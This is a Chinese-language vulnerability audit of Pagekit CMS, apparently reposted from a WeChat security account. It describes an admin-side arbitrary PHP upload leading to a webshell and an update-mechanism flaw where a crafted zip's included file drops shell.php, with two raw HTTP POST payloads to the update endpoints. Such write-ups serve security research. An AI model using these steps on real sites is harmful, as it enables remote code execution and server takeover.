Pagekit Cms审计报告

admin
admin
admin
139580
文章
114
评论
2024年1月6日08:44:41评论35 views字数 2589阅读8分37秒阅读模式



项目介绍


项目地址:

https://github.com/pagekit/pagekit


Pagekit Cms审计报告

Pagekit 是一个轻量级的模块化 CMS 系统,使用 Symfony 框架构建。



审计过程



后台任意文件上传漏洞路径:

app/system/modules/finder/src/Controller/FinderController.php//148 – 185行

Pagekit Cms审计报告

  此处存在过滤 但是后台只需简单配置即可上传任意php文件

复现过程:

Pagekit Cms审计报告

设置并保存 。

任意位置即可上传php文件

Pagekit Cms审计报告

Pagekit Cms审计报告

成功上传 此处上传所在目录为:

/storage/上传文件名

此处上传的路径为

http://localhost /storage/PassWaf_3.php

Pagekit Cms审计报告


Antsword链接成功

后台逻辑缺陷导致GetShell:

 漏洞路径

app/installer/src/Controller/UpdateController.php32-72行 downloadAction与updateAction函数

Pagekit Cms审计报告

Pagekit Cms审计报告

Download远程拉取一个文件到本地,update函数读取拉取的文件,其中调用SelfUpdater函数位置:
app/installer/src/SelfUpdater.php

Pagekit Cms审计报告

Pagekit Cms审计报告

此处可以看到 对远程拉取的文件中的

app/installer/requirements.php

进行包含,由此构造zip文件如下

Pagekit Cms审计报告

具体内容如下

Pagekit Cms审计报告

复现过程

Pagekit Cms审计报告

演示就上传到demo站点根目录了

Pagekit Cms审计报告

Payload:
POST/index.php/admin/system/update/download HTTP/1.1Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding:gzip, deflateAccept-Language:zh-CN,zh;q=0.9Connection:keep-aliveContent-Length: 58Content-Type:application/x-www-form-urlencodedCookie:admin_mojavi=vn4tg0umd7hd63kfl1p44e61td; PHPSESSID=i0fqqm5k71s9mq98q5n5ou3sad;DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=fe2a1e4a49da402d;DedeLoginTime=1692351480;DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=c7d09a9eb920d2c4; pagekit_session=55jlv45mm08d9n4kbs8i6jud1n;pagekit_auth=IsjDDxkm1%2FKFr6QsRuCTyWTKubgoaZWFQVTUpdIuqNlSXNqszKJ01BP6yEOn0E3iHost:Referer: http://localhost/index.php/admin/system/update/downloadUser-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/115.0.0.0 Safari/537.36url=app.zip&_csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2
继续发第二个包

Pagekit Cms审计报告

Payload:
POST/index.php/admin/system/update/update HTTP/1.1Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding:gzip, deflateAccept-Language:zh-CN,zh;q=0.9Cache-Control:max-age=0Connection:keep-aliveContent-Length: 46Content-Type:application/x-www-form-urlencodedCookie:admin_mojavi=vn4tg0umd7hd63kfl1p44e61td; PHPSESSID=i0fqqm5k71s9mq98q5n5ou3sad;DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=fe2a1e4a49da402d;DedeLoginTime=1692351480;DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=c7d09a9eb920d2c4; pagekit_session=55jlv45mm08d9n4kbs8i6jud1n;pagekit_auth=IsjDDxkm1%2FKFr6QsRuCTyWTKubgoaZWFQVTUpdIuqNlSXNqszKJ01BP6yEOn0E3iHost: localhostReferer: http://localhost/index.php/admin/system/update/updateUser-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/115.0.0.0 Safari/537.36_csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2

发送成功,看看包含的文件执行没有

Pagekit Cms审计报告

发现文件成功执行并生成shell.php

Pagekit Cms审计报告




原文始发于微信公众号(flower安全):Pagekit Cms审计报告

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月6日08:44:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Pagekit Cms审计报告https://cn-sec.com/archives/2370058.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息